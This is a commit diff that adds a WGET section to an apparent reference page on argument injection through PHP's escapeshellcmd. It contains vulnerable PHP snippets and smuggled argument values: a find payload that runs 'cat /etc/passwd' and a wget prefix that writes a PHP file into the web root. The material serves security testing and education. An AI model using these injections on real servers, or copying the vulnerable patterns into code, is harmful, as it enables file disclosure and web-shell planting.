Merge pull request #570 from gdraperi/patch-1

Update README.md
This commit is contained in:
Swissky 2022-10-11 18:49:41 +02:00 committed by GitHub
commit 3392980207
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

@ -30,8 +30,9 @@ We can see by printing the command that all the parameters are splited allowing
## Summary
* [List of exposed commands](#list-of-exposed-commands)
* [TAR](#TAR)
* [CURL](#CURL)
* [TAR](#TAR)
* [FIND](#FIND)
* [WGET](#WGET)
* [References](#references)
@ -81,6 +82,16 @@ $file = "sth -or -exec cat /etc/passwd ; -quit";
system("find /tmp -iname ".escapeshellcmd($file));
```
### WGET
Example of vulnerable code
```php
system(escapeshellcmd('wget '.$url));
```
Arbitrary file write
```php
$url = '--directory-prefix=/var/www/html http://example.com/example.php';
```
## References